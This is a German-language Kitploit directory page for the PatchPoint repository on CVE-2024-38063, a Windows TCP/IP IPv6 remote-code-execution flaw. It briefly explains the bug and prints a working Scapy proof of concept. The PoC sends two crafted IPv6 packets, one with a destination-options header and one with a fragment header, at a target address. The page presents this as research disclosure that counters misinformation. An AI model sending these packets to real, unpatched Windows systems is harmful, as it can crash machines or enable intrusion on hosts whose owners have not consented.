Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-38063 | Kitploit
Tools/GitHubGitHub/patchpoint/cve-2024-38063
SchwachstellenanalyseExploitationNetzwerksicherheitPenetrationstestsPayload-EntwicklungBinary-Exploitation
GitHubpatchpoint/cve-2024-38063

CVE-2024-38063

Repository anzeigen
203vor 1 JahrVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-38063

Überblick

Im August 2024 veröffentlichte Microsoft einen Patch für eine Windows-TCP/IP-Schwachstelle, die Remote-Codeausführung (RCE) ermöglicht. Einige Forscher haben bereits Machbarkeitsnachweise (PoC) für diese Schwachstelle veröffentlicht, und etwa zur gleichen Zeit haben auch die Forscher von PatchPoint ihre Analyse und Reproduktion dieses Problems abgeschlossen. Aufgrund der Verbreitung von Fehlinformationen auf verschiedenen Plattformen, einschließlich Twitter, scheinen die kritischen Punkte, die zum Auslösen dieser Schwachstelle erforderlich sind, missverstanden worden zu sein. Entgegen diesen Ungenauigkeiten haben wir uns entschlossen, einen PoC zu veröffentlichen, der zeigt, wie diese Schwachstelle mit dem Senden von nur zwei Paketen ausgelöst werden kann.; In Wirklichkeit ist eine große Anzahl von Paketen nicht notwendig, um diese Schwachstelle auszulösen.

PoC

root@kitploit:~
from scapy.all import *
IPAddr  = '' # fe80::XXXX:XXXX:XXXX:XXXX
MACAddr = '' # XX:XX:XX:XX:XX:XX
ExtHdrDestOpt  = Ether(dst=MACAddr) / IPv6(fl=1, dst=IPAddr) / IPv6ExtHdrDestOpt(options=[PadN(otype=0xC2)])
ExtHdrFragment = Ether(dst=MACAddr) / IPv6(fl=1, dst=IPAddr) / IPv6ExtHdrFragment()
sendp([ExtHdrDestOpt, ExtHdrFragment], verbose=False)

PCAP

pcap

DEMO

CVE-2024-38063_Demo.mp4

※ Um die Schwachstelle auszulösen, ist eine Wartezeit von ungefähr 60 Sekunden erforderlich

Referenz

  • https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38063
Tool herunterladen